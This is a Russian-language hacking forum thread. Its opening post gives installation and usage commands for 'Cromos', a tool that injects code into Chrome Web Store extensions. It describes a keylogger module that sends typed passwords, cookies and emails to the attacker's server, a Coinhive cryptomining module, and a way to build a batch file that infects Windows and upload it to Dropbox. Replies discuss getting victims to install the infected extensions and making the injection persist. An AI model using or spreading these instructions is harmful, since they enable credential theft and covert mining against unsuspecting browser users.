 |

11.11.2017, 22:31
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
И снова здравствуйте! Данный материал будет посвящен инструменту, позволяющему вносить изменения в расширения для браузера, наделяя их недокументированными возможностями.
Cromos - это инструмент для загрузки расширений из интернет-магазина Chrome и инъекции в них своего кода. Есть возможность создания собственных исполняемых файлов и функция размещения файлов в Dropbox.
Функционал:
· Загрузка расширения
· Инъекция кода
· Загрузка файлов в Dropbox
· Заражение ОС семейства Windows
Установка:
> git clone https://github.com/fbctf/cromos
> cd /cromos
> pip install –r requirements.txt
> python setup.py
Справка :
> ./cromos.py –h
Использование:
· Скачиваем подходящее расширение из маркета, предварительно узнав его ID.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb
Я использовал QR code scanner.
· Скачиваем нужное расширение и дополняем его установкой модуля keylogger.
> python cromos.py --extension oijdcdmnjjgnnhgljmhkjlablaejfeeb --load keylogger

Подходящего сервера для требований кейлоггера, у меня сейчас нет, так, что проверить его работу не смогу. Надеюсь, кто-то в комментариях протестирует и отпишется.
Модифицированное расширение, можно найти здесь:
Создание пакетного файла и загрузка его в Dropbox:
> python cromos.py --extension {id} --build {bat} --token {dropboxToken}
Модули:
· modules/keylogger - Этот модуль фиксирует все пароли, которые вы вводите в зараженном браузере через https или нет. Все, что вам нужно, это иметь, например php-сервер, для получения: данных электронной почты, пароли, файлы cookie и userAgent.
· modules/currency – Модуль майнинга криптовалют. Необходима учетная запись – coinhive.
Небольшой ролик, по использованию инструмента от разработчиков:
> https://asciinema.org/a/ENrke3a5kU83jC3hXIDdgWWyd?autoplay=1
На этом можно завершить. Спасибо за уделенное внимание.
|
|
|

14.11.2017, 03:39
|
|
Новичок
Регистрация: 21.06.2017
Сообщений: 0
С нами:
4681303
Репутация:
0
|
|
Кто-то настраивал на майнинг?) Знает какие параметры указывать?
|
|
|

15.11.2017, 07:16
|
|
Новичок
Регистрация: 07.07.2009
Сообщений: 2
С нами:
8866038
Репутация:
0
|
|
а юзверям его пропихивать как ? скидивать на страничку с запросом на установку модуля/плагина ?
|
|
|

15.11.2017, 11:26
|
|
Новичок
Регистрация: 03.11.2010
Сообщений: 5
С нами:
8170166
Репутация:
0
|
|
crestfo сказал(а):
Кто-то настраивал на майнинг?) Знает какие параметры указывать?
Загляни в исходник модуля
|
|
|

15.11.2017, 13:15
|
|
Новичок
Регистрация: 04.09.2017
Сообщений: 0
С нами:
4573785
Репутация:
0
|
|
Майнинг настраивал. Кого интересует вопрос на данную тему пишите конкретные вопросы. Тулза на самом деле очень простая, в принципе тоже самое делается и без нее ручками, просто дает чуть чуть автоматизации. Но не забываем про подписаные расширения, поэтому инжект будет лишь на 1 сессию так как запуск инжекта идет через chrome.exe --load-extension, а это запуск девелоперской версии хрома. После закрытия которой юзер будет запускать только юзерскую версию. Если хочется прописать юзеру постоянную работу через дев версию - нужно чутка включить голову, вариантов множество.
[doublepost=1510737349,1510737230][/doublepost]Да и маленький моментик для ТСа - стоило описать не много про токен боксы, а так же настройку выгрузки по токену в скриптах.
|
|
|

15.11.2017, 13:25
|
|
Новичок
Регистрация: 21.08.2017
Сообщений: 0
С нами:
4593574
Репутация:
0
|
|
Кейлогер по дефолту отправляет все на www.heroku.com ))
|
|
|

19.12.2017, 21:26
|
|
Новичок
Регистрация: 18.12.2017
Сообщений: 0
С нами:
4422059
Репутация:
0
|
|
Полезная статья, под лису есть что-то подобное?
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|